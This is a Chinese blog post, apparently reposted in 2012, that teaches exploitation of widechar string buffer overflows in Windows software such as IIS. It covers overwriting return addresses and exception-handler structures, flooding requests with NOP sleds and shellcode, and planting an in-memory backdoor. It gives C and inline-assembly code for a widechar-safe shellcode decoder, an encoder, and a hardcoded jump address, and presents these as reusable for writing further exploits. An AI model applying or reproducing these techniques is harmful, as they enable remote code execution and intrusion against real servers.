溢出专题(二) widechar的字符串缓冲溢出攻击技术

WINDOWS内部基本上是使用的widechar的字符串格式,因为没有进行串长度检测或者错误的以multibyte长度检测等原因,往往会造成缓冲 溢出。像eeye发现的.printer的溢出、.ida的溢出其实主要原因都是程序员错误对字符串以multibyte长度做检测,而buff用来处理 widechar字符串造成。由于这种溢出的特殊性以及这样的溢出越来越多,所以我们需要讨论widechar形式的缓冲溢出攻击。其实之前遇到很多这种 形式的缓冲溢出,对这样的溢出也有了一定的研究,所以基本上已经有了一些攻击方法,与大家一起交流。 对于单字节语言,字符串 转换成widechar格式后一般是“\xx\00\xx\00”的形式,所以覆盖后返回地址也将是“\00\xx\00\xx”这种形式,而 WINDOWS下\00\xx\xx\xx的地址一般是栈区,很少有dll加载在这个地址范围,所以要在\00\xx\00\xx的地址寻找实现比较通用 的跳转指令比较困难。当然如果本身有个可传递的shellcode处在这个区域,又能够直接定位,那就可以直接实现跳转。对于这种攻击,现在还没有稳定的 通用的实现方法。不过对于iis,因为开始时请求的很多域放在0x00xxxxxx这个区域里面,所以有个试的方法,就是请求里面的很多域(像url、 post域)都用大串空指令加shellcode构成,所幸的是iis默认下对于请求长度限制是0x20000 ,很大,好象还没有包含 post的数据, 所以可以构造一个特殊请求,占用大量内存,再溢出串使用 \00\xx\00\xx覆盖,只要这个\00\xx\00\xx刚好是在请求的某个域的空指令 代码区域里面,就能成功执行到shellcode。刚开始攻击时,因为有大量请求了,一般请求的各个域都超过\00xxxxxx的地址,所以一般会失败, 但win2k下的iis5.0出错后会自动重启动,这时成功几率就比较大了。选取合适的\00\xx\00\xx覆盖返回地址,加上大量的空指令,能够达到50%左右的成功率。shellcode实现代码可以成功后自动在内存里面开个后门,那样没有重启动之前以后的攻击就是100%成功了。 对于双字节语言,字符串转换成widechar格式后就不只是“\xx\00\xx\00”的形式了,基本上与常规的溢出没什么区别,只是要求溢出串要 转换成widechar后是正常的溢出攻击串,这就要求先把溢出串作为WideChar的形式经过WideCharToMultiByte转换。但不是所 有的串作为WideChar形式经过WideCharToMultiByte转换都合法,所以就先精心编写了一段合法的WideChar串对其它 shellcode解码,这就是shellcodefnlock里面的代码,里面连绝对跳转jmp(\xeb不在合法的WideChar范围)指令,过程 调用call(后面的数据会出现\00\00或者\ff\ff)都不能用, 所以定位都是采用别的方法。因为下面示例代码是采用的异常结构,此时ebx指向shellcode附近,所以如果不是使用异常结构,将是esp指向 shellcode附近,shellcodefnlock第一个push ebx指令应该换成push esp,其实也可以两种情况都用 push esp。因为异常结构时esp会在ebx之前,但那段shellcode一样会定位到自身。这样对于这种溢出,中(大陆简体中文、台湾的繁体中 文)、日、韩三种语言的测试代码都可以保证100%的成功。 想到这个方法了后,主要难度是在编写 shellcodefnlock代码上。这需要熟悉cpu指令码范围与WideChar范围,能够用哪些指令,参数范围等。这个代码调试的时候简直是累死 了,想很多编码算法,每个算法有哪些实现方法,每个实现方法需要些什么运算,哪些指令,参数等,再一个个试能不能满足要求。不过调试通了就省心了,后来很 多程序直接使用的时候就体会到了享受原来成果的乐趣。 下面就是实现代码: char  eipexceptwin2000cn[]="\x73\x67\xfa\x7f"; //  push ebx ; ret  address  适用于异常结构的跳转 #define  FNENDLONG   0x08 char *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90"; unsigned  char temp; shellcodefnadd=shellcodefnlock; temp=*shellcodefnadd; if(temp==0xe9) { ++shellcodefnadd; k=*(int *)shellcodefnadd; shellcodefnadd+=k; shellcodefnadd+=4; } for(k=0;k<=0x500;++k){ if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break; } /* 定位 shellcodefnlock的汇编代码 */ for(i=0;i<=0x10;i+=8){ memcpy(widecharbuff+i,"\x90\x90\x58\x68",4);  // 0x58 pop eax, 0x68  push num32 memcpy(widecharbuff+i+4,eipexceptwin2000cn,4); } /* 覆盖异常结构,连续覆盖,不需要精确定位,只要8字节对齐覆盖就可以 */ /* 0x58 0x68是为了跳过后面4字节 */ memcpy(widecharbuff+i,shellcodefnadd+k+8,2*wcslen(shellcodefnadd+k)); /* shellcodefnadd+k+8是得到的shellcodefnlock汇编代码地址 */ i=2*wcslen(widecharbuff); i=WideCharToMultiByte(0x3a8,0,widecharbuff,i,multibytebuff,0x1000,0,0); i=strlen(multibytebuff); /* 转换成MultiByte */ /*  0x3a8 是中文简体的代码页 */ memcpy(buff+OVERADD-OFFSETNUM+offset,multibytebuff,i); 一些变量定义: #define  NOPCODE       0x4e     // INC EDX    0x90 #define  SHELLDATAW    0x6090 #define  SHELLDATAA    0x9090 #define  OFFSETNUM     0x8 #define  DATABASE      0x61 对shellcode解码代码的汇编代码: void  shellcodefnlock() { _asm{ nop nop nop nop nop nop nop nop unlockdataw: nop push  ebx /*   可以通用 push esp  */ pop   esi loopload: lodsw cmp  ax,0x6099    // SHELLDATA jnz  loopload push esi push esi push esi pop  edi looplock:     lodsw cmp  ax,NOPCODE jz   toshell nop sub  al,DATABASE nop push eax pop  ecx lodsw nop sub  al,DATABASE lea  edx,dword ptr [eax+ecx*4+0x70] lea  edx,dword ptr [edx+ecx*4-0x70] lea  edx,dword ptr [edx+ecx*4+0x70] lea  edx,dword ptr [edx+ecx*4-0x70] push edx pop  eax /* temp=shellcodefnadd[j]; buff[OVERADD+offset+2*j]=DATABASE+temp/0x10; buff[OVERADD+offset+2*j+1]=DATABASE+temp%0x10; 的逆运算,但这儿是双字节形式 就是0xa*0x10+0xb=0xab这么个算法,为了迁就指令范围弄得这么复杂 */ stosb jz  looplock jnz looplock nop toshell:   pop  eax push eax push eax push eax ret nop _emit(0x99) _emit(0x60) _emit(0x0) _emit(0x0) _emit(0x0) _emit(0x0) NOP NOP NOP NOP NOP NOP NOP NOP } } 对shellcode编码代码: unsigned  char temp; for(j=0;j    temp=shellcodefnadd[j]; buff[OVERADD+offset+2*j]=DATABASE+temp/0x10; buff[OVERADD+offset+2*j+1]=DATABASE+temp%0x10; } 只要对真实shellcode代码这样编码后,拷贝到buff的WideCharToMultiByte后面就可以了。一般这儿可以一小段代码定位 MultiByte形式的shellcode代码,然后跳转执行就可以了,毕竟所有真实代码都这样编码就太长了,很多溢出串也有长度限制。以后要写别的这 种形式的溢出程序就只需像写一般溢出程序一样改写这实现跳转的shellcode就是了
posted @ 2012-07-15 23:20  adodo1  Views(227)  Comments(0Edit  收藏  举报